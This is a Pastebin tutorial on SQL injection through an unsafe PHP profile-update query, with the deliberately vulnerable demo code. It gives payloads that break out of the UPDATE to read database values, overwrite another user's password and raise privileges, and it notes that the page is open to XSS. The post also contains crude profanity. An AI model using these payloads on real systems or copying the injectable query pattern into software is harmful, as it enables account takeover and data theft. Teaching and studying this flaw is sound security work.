Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hey, iam going to show you a little about update sql injections.
- This occurs sometimes, for example in profil pages.
- The SQL-Statement is not secure, because there are not filter mechanisms active
- and i havent used PDO or similar.
- This is mostly used as blind sql injection, i show you, howto get output anyway.
- And far more interesting ;)
- The interesting line from the source code is the following
- if($_POST["submit"]) {
- mysql_query("UPDATE users SET user_name='".$_POST['user_name']."', user_password='".$_POST['user_password']."', user_realname='".$_POST['user_realname']."', user_website='".$_POST['user_website']."' where id=".$id) or die(mysql_error());
- echo "<b> Your Profile was sucessfully updated!</b><br>\n";
- }
- The code tells the query, to put the input directly into the database, which is a very dangerous behaviour.
- I have 2 prepared users,
- id 1 jon doe
- id 2 maria doe
- ______________________________________________________
- You can tell by simply checking the following payload:
- 1' OR 1='1
- This is a good indicator that the form is vulnerable,
- lets look at the source
- the input forms have very interesting names, you could just try to overwrite a col by doing the following:
- (the requirement is that the column names you are trying to overwrite are existent!)
- ', user_website=(select 123), user_realname='1
- what you actually do is escape from the column set, and then set your own by using a direct mysql subquery
- (select 123)
- and then using user_realname to close your query with a right syntax.
- this would tell the query, to insert YOUR statement inside of the query
- you actually just use your own statement. you can now print everything you want to. for ex:
- ', user_website=(select version()), user_realname='1
- You have an direct output from the database, but there is more.
- you can UPDATE values like passwords from other users
- ', user_password='mynewchangedpassword' where id=2#
- This will change the password, owned by another user (id 2).
- In this example, other values are getting overwritten too because all datas are getting overwritten in the example profil page update.
- lets check marias profile password
- as you can see, we have overwritten marias profile values.
- you can also higher your privileges when for example an admin flag just like
- admin=1 or rights=1/2/3/4 .
- this is a cheap tutorial. source code will be added.
- this is a presentation by frank, fuck you all !
- <?php
- $id = ($_GET['id'] ? $_GET['id'] : 1);
- mysql_connect("localhost", "stream", "hurensohn") or die(mysql_error());
- mysql_select_db("stream") or die(mysql_error());
- if($_POST["submit"]) {
- mysql_query("UPDATE users SET user_name='".$_POST['user_name']."', user_password='".$_POST['user_password']."', user_realname='".$_POST['user_realname']."', user_website='".$_POST['user_website']."' where id=".$id) or die(mysql_error());
- echo "<b> Your Profile was sucessfully updated!</b><br>\n";
- }
- $query = mysql_query("SELECT * from users where id=".intval($id));
- $array = mysql_fetch_array($query);
- ?>
- <h1>Edit your profile:</h1><br>
- <FORM method="POST">
- <LABEL for="user">Username: </LABEL>
- <INPUT autocomplete="off" type="text" name="user_name" value="<?php echo $array['user_name'] ?>"><BR>
- <LABEL for="real">Real Name: </LABEL>
- <INPUT autocomplete="off" type="text" name="user_realname" value="<?php echo $array['user_realname'] ?>"><BR>
- <LABEL for="password">Password: </LABEL>
- <INPUT autocomplete="off" type="text" name="user_password" value="<?php echo $array['user_password'] ?>"><BR>
- <LABEL for="website">Website: </LABEL>
- <INPUT autocomplete="off" type="text" name="user_website" value="<?php echo $array['user_website'] ?>"><BR>
- <INPUT type="submit" value="Send" name="submit">
- </FORM>
- <?php
- echo "Data:<br>\n";
- echo "<label id=\"user_id\"><b>ID: ".$array['id']."</b><br></label>\n";
- echo "<label id=\"user_name\"><b>Username: ".$array['user_name']."</b><br></label>\n";
- echo "<label id=\"user_realname\"><b>Realname: ".$array['user_realname']."</b><br></label>\n";
- echo "<label id=\"user_website\"><b>Website : ".$array['user_website']."</b><br></label>\n";
- ?>
- // you can have your cheap xss here :>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement